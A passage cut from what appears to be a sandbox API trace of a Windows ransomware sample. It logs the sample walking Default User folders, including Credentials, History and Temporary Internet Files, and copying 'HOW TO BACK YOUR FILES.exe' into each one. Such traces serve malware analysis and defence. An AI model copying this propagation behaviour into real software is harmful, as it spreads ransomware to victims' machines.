(in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0078.688] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.688] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.689] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.689] GetLastError () returned 0x0 [0078.689] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.689] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.689] CloseHandle (hObject=0xa4) returned 1 [0078.689] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.689] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58940500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58940500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.689] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.689] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.689] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials" [0078.689] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials" [0078.690] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.690] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.690] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.690] GetLastError () returned 0x0 [0078.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.690] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.690] CloseHandle (hObject=0xa4) returned 1 [0078.691] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.691] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.691] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.691] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.691] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History" [0078.691] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History" [0078.691] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.691] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.692] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.692] GetLastError () returned 0x0 [0078.692] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.692] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.692] CloseHandle (hObject=0xa4) returned 1 [0078.692] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.692] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x58966660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58966660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.692] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.692] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.692] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\Low" [0078.693] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\Low" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\Low" [0078.693] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.693] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.693] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.693] GetLastError () returned 0x0 [0078.693] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.693] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.693] CloseHandle (hObject=0xa4) returned 1 [0078.694] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.694] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.694] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.694] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.694] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\History.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\History.IE5" [0078.694] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\History.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\History.IE5" [0078.694] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.694] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.695] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.695] GetLastError () returned 0x0 [0078.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.695] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.695] CloseHandle (hObject=0xa4) returned 1 [0078.695] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.695] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x589d8a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x589d8a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.695] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.695] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.696] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data" [0078.696] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data" [0078.696] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.696] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.696] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.697] GetLastError () returned 0x0 [0078.697] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.697] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.697] CloseHandle (hObject=0xa4) returned 1 [0078.697] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.697] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.697] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.697] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.697] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files" [0078.697] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files" [0078.697] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.698] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.698] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.698] GetLastError () returned 0x0 [0078.698] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.698] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.698] CloseHandle (hObject=0xa4) returned 1 [0078.699] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.699] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x555c6940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x555c6940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.699] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.699] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.699] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0078.699] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0078.699] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.699] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.700] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.700] GetLastError () returned 0x0 [0078.700] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.700] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.700] CloseHandle (hObject=0xa4) returned 1 [0078.700] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.700] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.700] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.700] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.700] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0078.701] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0078.701] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.701] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.701] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.701] GetLastError () returned 0x0 [0078.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.701] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.701] CloseHandle (hObject=0xa4) returned 1 [0078.702] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.702] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.702] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.702] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.702] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0078.702] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0078.702] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.702] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.703] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 